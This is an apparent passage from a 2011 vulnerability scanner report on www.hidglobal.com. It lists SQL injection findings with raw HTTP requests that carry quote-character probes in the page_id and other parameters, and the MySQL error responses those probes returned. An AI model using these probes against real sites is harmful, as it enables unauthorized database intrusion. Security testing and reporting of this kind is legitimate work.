1.2. http://www.hidglobal.com/page.php [name of an arbitrarily supplied request parameter]
1.3. http://www.hidglobal.com/page.php [page_id parameter]
Severity: | High |
Confidence: | Certain |
Host: | http://www.hidglobal.com |
Path: | /onlineOrderStatusRe |
GET /onlineOrderStatusRe Host: www.hidglobal.com Proxy-Connection: keep-alive Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=10140716 |
HTTP/1.1 200 OK Date: Mon, 14 Feb 2011 18:30:20 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.3.3 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 45563 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... </script> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' LIMIT 0,1' at line 6 |
GET /onlineOrderStatusRe Host: www.hidglobal.com Proxy-Connection: keep-alive Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=10140716 |
HTTP/1.1 200 OK Date: Mon, 14 Feb 2011 18:30:20 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.3.3 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 46667 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.hidglobal.com |
Path: | /page.php |
GET /page.php?page_id=223&1'=1 HTTP/1.1 Host: www.hidglobal.com Proxy-Connection: keep-alive Referer: http://www.hidglobal.com/ Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_cc=true; __utmz=10140716 |
HTTP/1.1 200 OK Date: Mon, 14 Feb 2011 18:29:52 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.3.3 Set-Cookie: PHPSESSID=cfjmn8vtu0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 21882 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... </script> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' LIMIT 0,1' at line 6 |
GET /page.php?page_id=223&1''=1 HTTP/1.1 Host: www.hidglobal.com Proxy-Connection: keep-alive Referer: http://www.hidglobal.com/ Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_cc=true; __utmz=10140716 |
HTTP/1.1 200 OK Date: Mon, 14 Feb 2011 18:29:52 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.3.3 Set-Cookie: PHPSESSID=tg0873033t Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 22979 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.hidglobal.com |
Path: | /page.php |
GET /page.php?page_id=223' HTTP/1.1 Host: www.hidglobal.com Proxy-Connection: keep-alive Referer: http://www.hidglobal.com/ Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_cc=true; __utmz=10140716 |
HTTP/1.1 200 OK Date: Mon, 14 Feb 2011 18:29:42 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.3.3 Set-Cookie: PHPSESSID=mmvj5cve5q Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 20580 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... </script> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/page.php?page_id=223'' LIMIT 0,1' at line 6 |
GET /page.php?page_id=223'' HTTP/1.1 Host: www.hidglobal.com Proxy-Connection: keep-alive Referer: http://www.hidglobal.com/ Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_cc=true; __utmz=10140716 |
HTTP/1.1 200 OK Date: Mon, 14 Feb 2011 18:29:42 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.3.3 Set-Cookie: PHPSESSID=tbn39g53q9 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 21654 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |